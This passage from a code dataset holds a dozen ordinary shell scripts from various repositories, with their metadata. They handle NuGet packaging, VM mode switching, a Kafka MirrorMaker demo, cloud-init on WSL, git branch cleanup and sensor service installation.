nupkg_file=./build/$project.$version.nupkg
tool_file=./build/$toolproject.$tool_version.nupkg
version_suffix=''
fi
dotnet build "$CSPROJ_PATH$PROJECT_NAME" --configuration Release --framework netstandard2.0
dotnet build "$CSPROJ_PATH$PROJECT_NAME" --configuration Release --framework netstandard2.1
dotnet pack "$CSPROJ_PATH$PROJECT_NAME" -o "$BUILD_DIR" --include-symbols $version_suffix --configuration Release
dotnet pack "$TOOL_DIR$TOOL_PROJECT_NAME" -o "$BUILD_DIR" $version_suffix --configuration Release
# Only publish when building on master or develop
if [ "$GIT_BRANCH" == "master" ] || [ "$GIT_BRANCH" == "develop" ]; then
echo "Publishing $nupkg_file to $NUGET_SERVER"
# Publish to nuget using NUGET_SERVER and NUGET_API_KEY env variables
dotnet nuget push "$nupkg_file" -s "$NUGET_SERVER" -k "$INTERVAL_CRON_GENERATOR_KEY" -t 60 -n --force-english-output --skip-duplicate
dotnet nuget push "$tool_file" -s "$NUGET_SERVER" -k "$INTERVAL_CRON_GENERATOR_KEY" -t 60 -n --force-english-output --skip-duplicate
fi
| true |
d045790c078b2b00361c55ee6c44a2ee70fd3f47
|
Shell
|
KennyIT3/LinuxScripts
|
/Scripts/Trace.sh
|
UTF-8
| 597 | 3.375 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
Path="/data01/Server/*"
DEST="/data01/DataCopy"
Dest2="/data01/Linux"
#NEWEST=$(ls -trld $Path | head -1)
NEWEST=$(find $Path -type d -prune -exec ls -d {} \; | tail -n 1)
mkdir ${Dest2}
if [ -d "${NEWEST}" ] ; then
echo "The most recent entry is a directory"
cp -Rp "${NEWEST}" "${DEST}"
COPY=$(find /data01/DataCopy -type f | grep -E 'Linux|Admin|Bash' | xargs -i cp -rp {} /data01/DataCopy)
echo $COPY
ls -al ${Dest2}
exit 1
elif [ -z "${NEWEST}" ] ; then
echo "No file to copy"
exit 1
else
echo "Exiting"
exit 0
fi
| true |
84490e709b2de59a0efed17321246c48b4c83586
|
Shell
|
dune-universe/dune-universe
|
/packages/get_line.7.0.0/test.sh
|
UTF-8
| 1,114 | 2.828125 | 3 |
[] |
no_license
|
#!/bin/bash
#set -x # DEBUG
tmp=`mktemp`
seq 1 10 > $tmp
# set -x
GET_LINE=_build/default/src/get_line.exe
# 1st line
diff <($GET_LINE -r 1 -i $tmp) <(seq 1 1)
# 2nd line
diff <($GET_LINE -r 2 -i $tmp) <(seq 2 2)
# 3rd line
diff <($GET_LINE -r 3 -i $tmp) <(seq 3 3)
# lines 2 to 5
diff <($GET_LINE -r 2..5 -i $tmp) <(seq 2 5)
# all but line 1
diff <($GET_LINE -r 1 -i $tmp -v) <(seq 2 10)
# all but line 2
diff <($GET_LINE -r 2 -i $tmp -v) <(seq 1 1; seq 3 10)
# all but line 3
diff <($GET_LINE -r 3 -i $tmp -v) <(seq 1 2; seq 4 10)
# all but lines 2 to 5
diff <($GET_LINE -r 2..5 -i $tmp -v) <(seq 1 1; seq 6 10)
# first three lines
diff <($GET_LINE -r +3 -i $tmp) <(seq 1 3)
# last three lines
diff <($GET_LINE -r -3 -i $tmp) <(seq 8 10)
# lines 1,5 and 10
diff <($GET_LINE -r 1,5,10 -i $tmp) <(printf "1\n5\n10\n")
# lines 1,2 and 8,9,10
diff <($GET_LINE -r 2:3 -i $tmp) <(printf "1\n2\n8\n9\n10\n")
set -x
#errors
$GET_LINE -r 0 -i $tmp
$GET_LINE -r 11 -i $tmp
$GET_LINE -r 10..12 -i $tmp
$GET_LINE -r 12..15 -i $tmp
#different each time
$GET_LINE -r +10 -i $tmp --rand
set +x
rm -f $tmp
| true |
fa3edc93d2d12fccebf8479a5b6d3774ab4b9295
|
Shell
|
szaffarano/dotfiles
|
/tools/bin/mpid
|
UTF-8
| 348 | 3.46875 | 3 |
[] |
no_license
|
#!/bin/bash
FOUND=$(
jps -v |
grep Bootstrap |
grep -v Studio |
awk '{ print $1 }'
)
M_INSTANCES=$(echo "$FOUND" | wc -w)
if [[ -z "$FOUND" ]]; then
echo "No mule runtime instance running"
exit 1
elif [[ $M_INSTANCES -gt 1 ]]; then
echo "$M_INSTANCES instances of mule runtime found, expected 1: $FOUND"
exit 2
else
echo "$FOUND"
fi
| true |
570fad0930226a62d25493e66ab7dcc168a0d2fb
|
Shell
|
htrc/HTRC-DataCapsules
|
/backend/switch.sh
|
UTF-8
| 6,381 | 3.90625 | 4 |
[] |
no_license
|
#!/bin/bash
# Copyright 2013 University of Michigan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
. utils.sh
SCRIPT_DIR=$(cd $(dirname $0); pwd)
. $SCRIPT_DIR/capsules.cfg
usage () {
echo "Usage: $0 <Directory for VM> --mode <Security Mode> --policy <Policy File>"
echo ""
echo "(--wdir) Directory: The directory where this VM's data will be held"
echo ""
echo "--mode Boot to Secure Mode: One of 's(ecure)' or 'm(aintenance)', denotes whether the"
echo " guest being started should be booted into maintenance or secure mode"
echo ""
echo "--policy Policy File: The file that contains the policy for restricting this VM."
}
REQUIRED_OPTS="VM_DIR SECURE_MODE POLICY"
ALL_OPTS="$REQUIRED_OPTS"
UNDEFINED=12345capsulesxXxXxundefined54321
UBUNTU_12_04_IMAGE=uncamp2015-demo.img
for var in $ALL_OPTS; do
eval $var=$UNDEFINED
done
if [[ $1 && $1 != -* ]]; then
VM_DIR=$1
shift
fi
declare -A longoptspec
longoptspec=( [wdir]=1 [mode]=1 [policy]=1 )
optspec=":h-:d:m:p:"
while getopts "$optspec" OPT; do
if [[ "x${OPT}x" = "x-x" ]]; then
if [[ "${OPTARG}" =~ .*=.* ]]; then
OPT=${OPTARG/=*/}
OPTARG=${OPTARG#*=}
((OPTIND--))
else #with this --key value1 value2 format multiple arguments are possible
OPT="$OPTARG"
OPTARG=(${@:OPTIND:$((longoptspec[$OPT]))})
fi
((OPTIND+=longoptspec[$OPT]))
fi
case "${OPT}" in
d|wdir)
VM_DIR=$OPTARG
;;
m|mode)
RAW_MODE=$OPTARG
# Ensure mode string has proper format
if [ -z $RAW_MODE -o ${RAW_MODE:0:1} != 's' -a ${RAW_MODE:0:1} != 'm' ]; then
usage
exit 1
fi
[ ${RAW_MODE:0:1} = 's' ]
SECURE_MODE=$?
if [ $SECURE_MODE = 0 ]; then
REQUIRED_OPTS="$REQUIRED_OPTS POLICY"
fi
;;
p|policy)
POLICY=$OPTARG
;;
h|help)
usage;
exit 1
;;
*)
echo "error: Invalid argument '--${OPT}'"
usage
exit 1
;;
esac
done
MISSING_ARGS=0
for var in $REQUIRED_OPTS; do
if [[ ${!var} = $UNDEFINED ]]; then
echo "error: $var not set"
MISSING_ARGS=1
fi
done
if [[ $MISSING_ARGS -eq 1 ]]; then
usage
exit 1
fi
if [ ! -d $VM_DIR ] ; then
echo "Error: Invalid VM directory specified!"
exit 2
fi
# Load config file
. $VM_DIR/config
# Check if VM is already in the mode we're switching to
if [[ `cat $VM_DIR/mode` = "Maintenance" && $SECURE_MODE -ne 0 || `cat $VM_DIR/mode` = "Secure" && $SECURE_MODE -eq 0 ]]; then
echo "Error: VM is already in that mode"
exit 3
fi
# If secure mode, sync storage, apply policy, take snapshot, mount secure volume, update modefile
if [ $SECURE_MODE = 0 ]; then
# Wait for secure volume to finish being created (in case it hasn't yet by createvm)
for time in $(seq 1 30); do
if [ -e $VM_DIR/$SECURE_VOL ]; then
break
fi
sleep 1
done
if [ ! -e $VM_DIR/$SECURE_VOL ]; then
echo "Error: CreateVM failed to create secure volume; unable to enter secure mode!"
exit 5
fi
# Sync storage
echo "commit all" | nc -U $VM_DIR/monitor >/dev/null
# Apply Firewall Policy
sudo $SCRIPT_DIR/fw.sh $VM_DIR $POLICY
FW_RES=$?
if [ $FW_RES -ne 0 ]; then
echo "Error: Failed to apply firewall policy; error code ($FW_RES)"
exit 6
fi
# Take Capsules Snapshot
echo "savevm capsules" | nc -U $VM_DIR/monitor >/dev/null
# Mount Secure Volume
echo "drive_add 0 if=none,id=secure_volume,file=$VM_DIR/$SECURE_VOL" | nc -U $VM_DIR/monitor >/dev/null
if beginswith $UBUNTU_12_04_IMAGE $IMAGE || [ -z ${NEGOTIATOR_ENABLED+x} ] || [ $NEGOTIATOR_ENABLED -eq 0 ]; then
echo "device_add usb-storage,id=secure_volume,drive=secure_volume" | nc -U $VM_DIR/monitor >/dev/null
else
echo "device_add virtio-blk-pci,id=secure_volume,drive=secure_volume" | nc -U $VM_DIR/monitor >/dev/null
fi
#
# Mount Spool Volume
echo "drive_add 1 id=spool,if=none,file=$VM_DIR/spool_volume" | nc -U $VM_DIR/monitor >/dev/null
if beginswith $UBUNTU_12_04_IMAGE $IMAGE || [ -z ${NEGOTIATOR_ENABLED+x} ] || [ $NEGOTIATOR_ENABLED -eq 0 ]; then
echo "device_add usb-storage,id=spool,drive=spool" | nc -U $VM_DIR/monitor >/dev/null
else
echo "device_add virtio-blk-pci,id=spool,drive=spool" | nc -U $VM_DIR/monitor >/dev/null
fi
if ! beginswith $UBUNTU_12_04_IMAGE $IMAGE && [ -n "$NEGOTIATOR_ENABLED" ] && [ $NEGOTIATOR_ENABLED -eq 1 ]; then
# Automount volumes and fix permissions
sleep 5
echo "Automounting disks and fixing permissions"
python $SCRIPT_DIR/tools/negotiator-cli/negotiator-cli.py -e fix-securevol-permissions $VM_DIR/negotiator-host-to-guest.sock
fi
# Start release daemon if not already running
if [ ! -e $VM_DIR/release_pid ]; then
nohup $SCRIPT_DIR/released.sh $VM_DIR 2>>$VM_DIR/release_log >>$VM_DIR/release_log &
echo "$!" > $VM_DIR/release_pid
fi
# Update Mode File
echo "Secure" > $VM_DIR/mode
# If maintenance, unmount secure volume, revert snapshot, remove policy, update modefile
else
# Unmount Secure Volume and Spool Volume
echo "device_del secure_volume" | nc -U $VM_DIR/monitor >/dev/null
echo "drive_del secure_volume" | nc -U $VM_DIR/monitor >/dev/null
echo "device_del spool" | nc -U $VM_DIR/monitor >/dev/null
echo "drive_del spool" | nc -U $VM_DIR/monitor >/dev/null
# Revert Capsules Snapshot
echo "loadvm capsules" | nc -U $VM_DIR/monitor >/dev/null
# Replace Firewall Policy
sudo $SCRIPT_DIR/fw.sh $VM_DIR $POLICY
FW_RES=$?
if [ $FW_RES -ne 0 ]; then
echo "Error: Failed to replace firewall policy; error code ($FW_RES)"
exit 7
fi
# The devices have been removed already,
# this just resets things for future secure transitions
echo "usb_del 0.0" | nc -U $VM_DIR/monitor >/dev/null
# Update Mode File
echo "Maintenance" > $VM_DIR/mode
fi
exit 0
| true |
fe3e0298ccb37e68ecafb777ff8c7a24c4759d49
|
Shell
|
vdesabou/kafka-docker-playground
|
/multi-data-center/mirrormaker2/mirrormaker2-plaintext.sh
|
UTF-8
| 1,980 | 3.484375 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )"
source ${DIR}/../../scripts/utils.sh
if ! version_gt $TAG_BASE "5.3.99"; then
logwarn "WARN: This example is working starting from CP 5.4 only"
exit 111
fi
${DIR}/../../environment/mdc-plaintext/start.sh "${PWD}/docker-compose.mdc-plaintext.yml"
log "Sending sales in Europe cluster"
seq -f "european_sale_%g ${RANDOM}" 10 | docker container exec -i broker-europe kafka-console-producer --broker-list localhost:9092 --topic sales_EUROPE
log "Sending sales in US cluster"
seq -f "us_sale_%g ${RANDOM}" 10 | docker container exec -i broker-us kafka-console-producer --broker-list localhost:9092 --topic sales_US
log "Consolidating all sales (logs are in /tmp/mirrormaker.log):"
# run in detach mode -d
docker exec -d connect-us bash -c '/usr/bin/connect-mirror-maker /etc/kafka/connect-mirror-maker.properties > /tmp/mirrormaker.log 2>&1'
# docker exec connect-us bash -c '/usr/bin/connect-mirror-maker /etc/kafka/connect-mirror-maker.properties'
log "sleeping 120 seconds"
sleep 120
# Topic Renaming
# By default MM2 renames source topics to be prefixed with the source cluster name. e.g. if topic foo came from cluster A then it would be named A.foo on the destination. In the current release (5.4) MM2 does not support any different topic naming strategies out of the box.
log "Verify we have received the data in topic US.sales_US in EUROPE"
timeout 60 docker container exec broker-europe kafka-console-consumer --bootstrap-server localhost:9092 --topic "US.sales_US" --from-beginning --max-messages 10
log "Verify we have received the data in topic EUROPE.sales_EUROPE topics in the US"
timeout 60 docker container exec broker-us kafka-console-consumer --bootstrap-server localhost:9092 --topic "EUROPE.sales_EUROPE" --from-beginning --max-messages 10
log "Copying mirrormaker logs to /tmp/mirrormaker.log"
docker cp connect-us:/tmp/mirrormaker.log /tmp/mirrormaker.log
| true |
25df4af3fd0bd029ecdcb7e5eb887afc931807d5
|
Shell
|
tvararu/react-motion-unmounting-demo
|
/scripts/deploy.sh
|
UTF-8
| 528 | 2.90625 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
ROOT_FOLDER=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/..
cd $ROOT_FOLDER
npm install
rm -Rf meteor/react-build-generated
./node_modules/.bin/webpack --config webpack/production.config.js -p
find meteor/react-build-generated/client -maxdepth 1 -mindepth 1 -not -name main.js \
-exec mv '{}' meteor/public/assets \;
find meteor/react-build-generated/server -maxdepth 1 -mindepth 1 -not -name main.js \
-exec rm -f '{}' \;
cd meteor
meteor deploy --settings $ROOT_FOLDER/settings/production.json $@
| true |
93bcbee8b3a13913a8e32a1d8db8960792c35375
|
Shell
|
cmbntr/wsl-cloud-init
|
/wsl-cloud-init.sh
|
UTF-8
| 1,040 | 3.546875 | 4 |
[] |
no_license
|
#!/bin/bash
if [ "$1" = "--noclean" ]; then
shift 1
CLEAN="0"
else
echo "clean existing cloud-init config"
CLEAN="1"
cloud-init clean --logs --seed
fi
if [ -n "$1" ]; then
DEBUG_PROC_CMDLINE="ds=nocloud;seedfrom=$1"
shift 1
case "$DEBUG_PROC_CMDLINE" in
*/)
# Slash at end, ok!
;;
*)
# Add slash
DEBUG_PROC_CMDLINE="$DEBUG_PROC_CMDLINE/"
;;
esac
else
DEBUG_PROC_CMDLINE="$(cat /proc/cmdline)" # by default cloud-init uses /proc/1/cmdline in a 'container'
fi
set -o pipefail
set -eu
exec 2>&1
DSIDENTIFY="/usr/lib/cloud-init/ds-identify"
if [ ! -x $DSIDENTIFY ]; then
DSIDENTIFY="$(find /usr -path '*/cloud-init/ds-identify' | head -n 1)"
fi
export DEBUG_PROC_CMDLINE
DEBUG_LEVEL="$CLEAN" DI_LOG=stderr $DSIDENTIFY --force
cloud-init --version
cloud-init init --local
cloud-init init
cloud-init modules --mode=config
cloud-init modules --mode=final
cloud-init analyze show
cloud-id -j
if [ "nocloud" != "$(cloud-id | tr -d '\n')" ]; then
echo "cloud-id should be nocloud!"
exit 1
fi
| true |
584137898df111a19a2b06d14de0c9e575cbdbae
|
Shell
|
kairoaraujo/checklist-unix
|
/modules/mod_SunOS.sh
|
UTF-8
| 4,209 | 3.046875 | 3 |
[] |
no_license
|
#!/bin/sh
#
# checklist-unix
#
# Kairo Araujo (c) 2010-2016
#
##############################################################################
#
# mkcheck()
#
# 1. Create the command
#
# file_name {FILE_NAME}
# {COMMAND} > $CHKU_GFILE
#
# Rules for {FILE_NAME}
#
# a. low case
#
# b. do not use special characters, only _ is permitted.
#
# c. be clear
#
# Rules for {COMMAND}
#
# a. the final output needs to be send to variable $CHKU_GFILE
#
# Example 1:
#
# file_name netstat_anv
# netstat -anv > $CHKU_GFILE
#
# Example 2: (with conditional)
#
# if [ -f /usr/sbin/prtconf ]
# then
# file_name prtconf
# /usr/sbin/prtconf >$CHKU_GFILE
# fi
#
###############################################################################
#
#
mkcheck ()
{
file_name hostname_do_servidor
hostname >$CHKU_GFILE
file_name versionamento_do_servidor
uname -a >$CHKU_GFILE
file_name analise_do_mirror
metastat >$CHKU_GFILE
file_name status_do_mirror
metastat -c >$CHKU_GFILE
file_name release_do_servidor
cat /etc/release >$CHKU_GFILE
file_name filesystems_montados
df -h | awk '{ print $1" \t"$2" \t"$6 }' >$CHKU_GFILE
file_name status_do_veritas_volume_manager
vxdisk -o alldgs list | grep -v \( >$CHKU_GFILE
file_name rotas_de_rede
netstat -rnv | cut -c 1-65 >$CHKU_GFILE
file_name configuracao_de_rede
ifconfig -a >$CHKU_GFILE
file_name arquivo_vfstab
cat /etc/vfstab|sort >$CHKU_GFILE
file_name dispositivos_de_io
iostat -En >$CHKU_GFILE
file_name configuracao_de_hardware_prtdiag
prtdiag >$CHKU_GFILE
file_name configuracao_de_hardware_prtconf
prtconf >$CHKU_GFILE
file_name interfaces_hba
fcinfo hba-port >$CHKU_GFILE
file_name dispositivos_ethernet
dladm show-dev >$CHKU_GFILE
file_name status_dos_servicos
svcs | awk '{ print $1" "$3 }' >$CHKU_GFILE
file_name compartilhamentos_share
share | awk '{ print $1" "$3 }' >$CHKU_GFILE
file_name compartilhamentos_showmount
showmount | awk '{ print $1" "$3 }' >$CHKU_GFILE
echo ""
file_name modulos_do_sistema
modinfo | awk '{print $6,$7,$8,$9,$10,$11,$12}' >$CHKU_GFILE
#####################################################################
## Adicionado Modulo para checagem do Veritas Volume Manger!!! #
## Adicionado Modulo para checagem do Veritas Cluster!!!! #
#####################################################################
PATH=${PATH}:/usr/lib/vxvm/diag.d:/etc/vx/diag.d:/opt/VRTS/bin:/opt/VRTSvlic/bin
export PATH
if [ -f /opt/VRTS/bin/vxdg ]
then
file_name status_dos_discos_veritas
vxdisk list >$CHKU_GFILE
file_name serial_dos_discos
vxdisk -e list >$CHKU_GFILE
file_name disk_groups
vxdg list >$CHKU_GFILE
file_name status_volumes
vxprint -ht >$CHKU_GFILE
file_name status_controladoras
vxdmpadm listctlr all >$CHKU_GFILE
file_name status_controladoras_storage
vxdmpadm listenclosure all >$CHKU_GFILE
file_name storages_suportados
vxddladm listsupport >$CHKU_GFILE
file_name status_daemon_vxdctl
vxdctl mode >$CHKU_GFILE
file_name status_cluster_enable
vxdctl -c mode
file_name checa_licencas_veritas
vxlicrep >$CHKU_GFILE
file_name checa_licencas_ativadas
vxlicrep -e >$CHKU_GFILE
file_name status_multipath_veritas
vxdmpadm stat restored >$CHKU_GFILE
fi
if [ -f /opt/VRTSvcs/bin/hastatus ]
then
file_name status_cluster
hastatus -summary >$CHKU_GFILE
file_name status_servicos_cluster
hares -display >$CHKU_GFILE
file_name configuracoes_cluster
hagrp -display >$CHKU_GFILE
file_name nodes_do_cluster
hasys -list >$CHKU_GFILE
file_name status_nodes_cluster
hasys -state >$CHKU_GFILE
file_name nodeid_do_host
hasys -nodeid >$CHKU_GFILE
file_name status_do_llstat
llstat >$CHKU_GFILE
file_name status_do_gab
gabconfig -a >$CHKU_GFILE
fi
}
| true |
2efca1c39b9c32c322617ca827ce96b716f5ecd7
|
Shell
|
josephtyler/home
|
/bin/git-cleanup.sh
|
UTF-8
| 725 | 3.65625 | 4 |
[] |
no_license
|
#!/bin/bash
set -e
REMOTE=0
SHOW_UNMERGED=0
while getopts ru option; do
case "${option}" in
r) REMOTE=1 ;;
u) SHOW_UNMERGED=1 ;;
esac
done
# Always run this from master
# git checkout -q master
# Fetch and prune
git fetch --prune
# Delete local merged branches
git branch --merged | grep -v '\*\|master\|develop' | xargs -n 1 git branch -d
# Delete remote merged branches
if [[ $REMOTE -eq 1 ]]; then
git branch -r --merged | perl -ne 'print "$1\n" if /origin\/(.*)/ and !/HEAD/ and !/master/' | xargs -n 1 git push origin --delete
fi
if [[ $SHOW_UNMERGED -eq 1 ]]; then
echo "Unmerged local branches:"
echo
git branch --no-merged
if [[ $REMOTE -eq 1 ]]; then
fi
fi
| true |
65ae1bf8b4380247fb95176e09841e9cd436e696
|
Shell
|
StartupAndPlay/startupandplay.com
|
/bin/clone.sh
|
UTF-8
| 407 | 3.703125 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
cd `dirname $0`/..
set -e
read -p "Local environment? (y/n) " -n 1
if [[ $REPLY =~ ^[Yy]$ ]]
then
touch env_local
echo -e "\nCreated environment file successfully"
else
read -p "Staging environment? (y/n) " -n 1
if [[ $REPLY =~ ^[Yy]$ ]]
then
touch env_staging
echo -e "\nCreated environment file successfully"
else
echo -e "\nNo environment file was created."
fi
fi
| true |
fab4aaec60c117c5188f22e8e9c612fb3fde6557
|
Shell
|
DataDog/dd-trace-dotnet
|
/profiler/build/run.sh
|
UTF-8
| 131 | 3.1875 | 3 |
[
"Apache-2.0",
"MIT"
] |
permissive
|
#!/bin/bash
FILE=$1.linux.$2.json
if [ -f "$FILE" ]; then
${GOPATH}/bin/timeit $FILE
else
echo "$FILE does not exist."
fi
| true |
9502e3a3d89385e98359f35e99c53d86ab079e8f
|
Shell
|
sai-raavi/MyS3backup
|
/config/ecs-optimized/health-webserver.sh
|
UTF-8
| 396 | 2.9375 | 3 |
[] |
no_license
|
#!/bin/bash
case $1 in
start)
test -e /var/run/health-webserver.pid && kill `cat /var/run/health-webserver.pid`
exec /usr/local/bin/health-webserver.py 2>&1 | /usr/bin/logger -t health-webserver & ;;
stop)
test -e /var/run/health-webserver.pid && kill `cat /var/run/health-webserver.pid` ;;
*)
echo "usage: health-webserver {start|stop}" ;;
esac
exit 0
| true |
a22bded569f6f835455aa2052c69b5334c603a06
|
Shell
|
JKirchartz/dotfiles
|
/scripts/trellis_up.sh
|
UTF-8
| 361 | 2.828125 | 3 |
[] |
no_license
|
#! /bin/sh
#
# trellis_up.sh <path/to/trellis/project>
# Copyright (C) 2017 jkirchartz <me@jkirchartz.com>
#
# Distributed under terms of the NPL (Necessary Public License) license.
#
cd "$1/trellis" || exit 1;
vagrant up
cd "../theme" || exit 1;
if [ -n "$TMUX" ]; then
tmux split-window -v -p 90 "gulp && gulp watch" 'C-m'
else
gulp && gulp watch
fi
| true |
c14dec8111030f62e8ba07868ec176597c4f5c3c
|
Shell
|
vegito11/Day-Today
|
/Bash/Programms/Strings/get_user_info.sh
|
UTF-8
| 227 | 2.65625 | 3 |
[] |
no_license
|
echo 'Enter Username :\c'
read username
line=`grep $username /etc/passwd`
IFS=:
set $line
echo "USername : $1"
echo "User ID : $2"
echo "Group ID : $3"
echo "Comment Field : $4"
echo "Home Folder : $5"
echo "Default Shell : $6"
| true |
538e083e059ee8cac851a41ea410ea911e0373f7
|
Shell
|
carlj/IoT-Hackathon
|
/helper/services/install-services.sh
|
UTF-8
| 1,210 | 2.609375 | 3 |
[] |
no_license
|
#!/bin/bash
cd "$(dirname "$0")"
# Install DHT22 Service
sudo cp dht22.service /etc/systemd/system/dht22.service
sudo cp dht22-mqtt.service /etc/systemd/system/dht22-mqtt.service
#sudo systemctl enable dht22.service
#sudo systemctl enable dht22-mqtt.service
# Install L3GD20 Service
sudo cp l3gd20.service /etc/systemd/system/l3gd20.service
sudo cp l3gd20-mqtt.service /etc/systemd/system/l3gd20-mqtt.service
#sudo systemctl enable l3gd20.service
#sudo systemctl enable l3gd20-mqtt.service
# Install LSM303 Service
sudo cp lsm303.service /etc/systemd/system/lsm303.service
sudo cp lsm303.service /etc/systemd/system/lsm303-mqtt.service
#sudo systemctl enable lsm303.service
#sudo systemctl enable lsm303-mqtt.service
# Install MTK3339 Service
sudo cp mtk3339.service /etc/systemd/system/mtk3339.service
sudo cp mtk3339-mqtt.service /etc/systemd/system/mtk3339-mqtt.service
#sudo systemctl enable mtk3339.service
#sudo systemctl enable mtk3339-mqtt.service
# Install TSL2591 Service
sudo cp tsl2591.service /etc/systemd/system/tsl2591.service
sudo cp tsl2591-mqtt.service /etc/systemd/system/tsl2591-mqtt.service
#sudo systemctl enable tsl2591.service
#sudo systemctl enable tsl2591-mqtt.service
| true |
e5f6c29a3cf1c27555f584beed2800d60457df7b
|
Shell
|
qmutz/nnn
|
/plugins/bookmarks
|
UTF-8
| 1,648 | 4.125 | 4 |
[
"BSD-2-Clause"
] |
permissive
|
#!/usr/bin/env sh
# Description: Use named bookmarks using symlinks
#
# Dependencies: fzf
#
# Usage:
# 1. Create a $BOOKMARKS_DIR directory
# By default, $BOOKMARKS_DIR is set to: ${XDG_CACHE_HOME:-$HOME/.cache}/nnn/bookmarks
#
# 2. Create symlinks to directories
# `cd $BOOKMARKS_DIR`
# `ln -s /path/to/useful/directory bookmark_name`
# `ln -s $XDG_CONFIG_HOME/nnn/plugins nnn_plugins"
# `ln -s /path/to/documents docs`
# `ln -s /path/to/media media`
# `ln -s /path/to/movies movies`
#
# Bonus tip: Add `$BOOKMARKS_DIR` to your `$CDPATH`
# https://linux.101hacks.com/cd-command/cdpath/
#
# TODO:
# 1. Remove `fzf` dependency
#
# Shell: POSIX compliant
# Author: Todd Yamakawa
if [ -z "$BOOKMARKS_DIR" ]; then
BOOKMARKS_DIR="${XDG_CACHE_HOME:-$HOME/.cache}/nnn/bookmarks"
fi
# Check if NNN_PIPE is set
if [ -z "$NNN_PIPE" ]; then
echo 'ERROR: NNN_PIPE is not set' | ${PAGER:-less}
exit 2
fi
# Get all directory symlinks
get_links() {
for entry in "$1"/*; do
# Skip unless directory symlink
[ -h "$entry" ] || continue
[ -d "$entry" ] || continue
printf "%20s -> %s\n" "$(basename "$entry")" "$(readlink -f "$entry")"
done | fzf |
awk 'END {
if (length($1) == 0) { print "'"$PWD"'" }
else { print "'"$BOOKMARKS_DIR"'/"$1 }
}'
}
# Choose symlink with fzf
cddir="$(get_links "$BOOKMARKS_DIR")"
# Writing result to NNN_PIPE will change nnn's active directory
# https://github.com/jarun/nnn/tree/master/plugins#send-data-to-nnn
context=0
printf "%s" "${context}c$(readlink -f "$cddir")" > "$NNN_PIPE"
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.